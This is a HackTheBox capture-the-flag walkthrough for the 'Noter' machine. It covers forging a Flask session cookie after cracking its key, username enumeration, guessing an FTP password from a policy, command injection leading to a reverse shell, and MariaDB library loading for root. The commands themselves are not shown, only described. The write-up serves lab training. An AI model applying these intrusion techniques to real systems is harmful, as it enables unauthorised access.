Noter - [HTB]

Cover Image for Noter - [HTB]
Marmeus
Marmeus

Introduction

Noter is a medium Linux machine from HackTheBox where the attacker will have to crack a Flask JWT cookie and make some user enumeration to obtain FTP credentials. Then, discovering the application's password policy, it will be able to get access to a different FTP account, obtaining the web application source code. After analysing the source code, a vulnerable function is discovered, allowing it to obtain RCE. Finally, because the MariaDB service is executed by root, a library can be loaded to execute system commands as root.

Enumeration

As always, let's start finding all opened ports in the machine with Nmap.

Then, we continue with a deeper scan of every opened port, getting more information about each service.

At port 5000, there is an HTTP server with a note application web page .

Noter

Once registered and logged into the application, a weird JWT cookie is obtained, as seen in the screenshot.

JWT Token

Exploitation 1

Looking for Werkzeug JWT cookies, some posts appear talking about Flask JWTs. Then, looking about how to crack flask JWT there is this post, where you can learn how to crack a Flask JWT key with flask-unsign.

Once the key is obtained, it is possible to modify the cookie changing the username as "Administrator."

However, it seems that this user can not be used to log in to the web page.

Unauthorized administrator user

Nonetheless, it is possible to enumerate registered users on the application. This is possible because trying to access a non-existent account, you get "Invalid credentials", but if the account exists, so you typed the wrong password, the responded message is "Invalid login".

Enumerating usernames that match the "Invalid login" message, the user blue is obtained.

Now, changing the username to blue in the Flask JWT cookie, it is possible to access the application as blue.

The user blue has a note containing some FTP credentials.

Noter Premium membership

Inside the FTP server, there is a policy.pdf file.

Reading the documentation from the PDF, it is possible to know the password creation policy.

So, because the note was written by "ftp_admin" the password should look like "ftp_admin@Noter!".

Inside the ftp_admin user, there are two .ZIP backup files.

Exploitation 2

Making a diff between the file app.py of both backups, some database credentials and one interesting function that executes commands is obtained.

The code requires a URL. Then, a request will be made, retrieving the text in the response. This text will replace $'{r.text.strip()}' in the command that will be executed. So, if the text in the response is 'echo Marmeus', the final command will be node misc/md-to-pdf.js Marmeus {rand_int}.

Because no input sanitisation is made, a semicolon can be added, making it possible to perform arbitrary code execution.

In order to obtain a reverse shell, you need the following set-up.

Finally, execute the following command.

The result will be a reverse shell as svc.

Privilege Escalation

Using the database credentials, it is possible to access the web page database, but it is not very interesting.

However, the service is executed as root, so maybe it possible to obtain code executiont.

On exploitdb, there is a library that can be used compatible with this version of MariaDB.

Following the steps, you should obtain the user flag.